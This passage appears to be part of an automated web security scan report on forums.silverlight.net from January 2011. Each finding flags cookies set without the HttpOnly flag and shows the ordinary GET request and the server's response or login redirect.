Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 25458
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:51 GMT; expires=Sun, 29-Jan-2012 23:18:51 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:52 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Questi
...[SNIP]...

17.205. http://forums.silverlight.net/forums/t/217719.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/t/217719.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:49 GMT; expires=Sun, 29-Jan-2012 23:18:49 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217719.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 29760
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:49 GMT; expires=Sun, 29-Jan-2012 23:18:49 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:49 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Do I r
...[SNIP]...

17.206. http://forums.silverlight.net/forums/t/217724.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/t/217724.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:00 GMT; expires=Sun, 29-Jan-2012 23:19:00 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:01 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217724.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 25032
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:00 GMT; expires=Sun, 29-Jan-2012 23:19:00 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:01 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
WP7 -
...[SNIP]...

17.207. http://forums.silverlight.net/forums/t/217726.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/t/217726.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:50 GMT; expires=Sun, 29-Jan-2012 23:18:50 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:50 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217726.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 23414
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:50 GMT; expires=Sun, 29-Jan-2012 23:18:50 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:50 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Callin
...[SNIP]...

17.208. http://forums.silverlight.net/forums/t/217727.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/t/217727.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:49 GMT; expires=Sun, 29-Jan-2012 23:18:49 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:50 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217727.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 23123
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:49 GMT; expires=Sun, 29-Jan-2012 23:18:49 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:50 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Astero
...[SNIP]...

17.209. http://forums.silverlight.net/forums/thread/396640.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/thread/396640.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:42 GMT; expires=Sun, 29-Jan-2012 23:20:42 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/thread/396640.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
ETag: ""
Location: /forums/p/171739/396640.aspx#396640
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:42 GMT; expires=Sun, 29-Jan-2012 23:20:42 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:42 GMT
Connection: close

17.210. http://forums.silverlight.net/forums/topicsactive.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/topicsactive.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:20 GMT; expires=Sun, 29-Jan-2012 23:17:20 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.211. http://forums.silverlight.net/forums/viewall.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/viewall.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:47 GMT; expires=Sun, 29-Jan-2012 23:20:47 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/viewall.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73300
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:47 GMT; expires=Sun, 29-Jan-2012 23:20:47 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:47 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
All Th
...[SNIP]...

17.212. http://forums.silverlight.net/members/BradleyGZ.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/BradleyGZ.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:32 GMT; expires=Sun, 29-Jan-2012 23:16:32 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/BradleyGZ.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fBradleyGZ.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:32 GMT; expires=Sun, 29-Jan-2012 23:16:32 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:32 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fBradleyGZ.a
...[SNIP]...

17.213. http://forums.silverlight.net/members/ColinBlair.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/ColinBlair.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:00 GMT; expires=Sun, 29-Jan-2012 23:16:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/ColinBlair.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 238
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fColinBlair.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:00 GMT; expires=Sun, 29-Jan-2012 23:16:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:00 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fColinBlair.
...[SNIP]...

17.214. http://forums.silverlight.net/members/Daoping-Liu-_2D00_-MSFT.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/Daoping-Liu-_2D00_-MSFT.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/Daoping-Liu-_2D00_-MSFT.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 251
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fDaoping-Liu-_2D00_-MSFT.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:38 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fDaoping-Liu
...[SNIP]...

17.215. http://forums.silverlight.net/members/Datikos.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/Datikos.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:58 GMT; expires=Sun, 29-Jan-2012 23:16:58 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/Datikos.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 235
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fDatikos.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:58 GMT; expires=Sun, 29-Jan-2012 23:16:58 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:58 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fDatikos.asp
...[SNIP]...

17.216. http://forums.silverlight.net/members/David-Anson.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/David-Anson.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:09 GMT; expires=Sun, 29-Jan-2012 23:17:09 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/David-Anson.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 239
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fDavid-Anson.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:09 GMT; expires=Sun, 29-Jan-2012 23:17:09 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:09 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fDavid-Anson
...[SNIP]...

17.217. http://forums.silverlight.net/members/Fredrik_5F00_.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/Fredrik_5F00_.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/Fredrik_5F00_.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 241
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fFredrik_5F00_.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:20 GMT
Connection: close

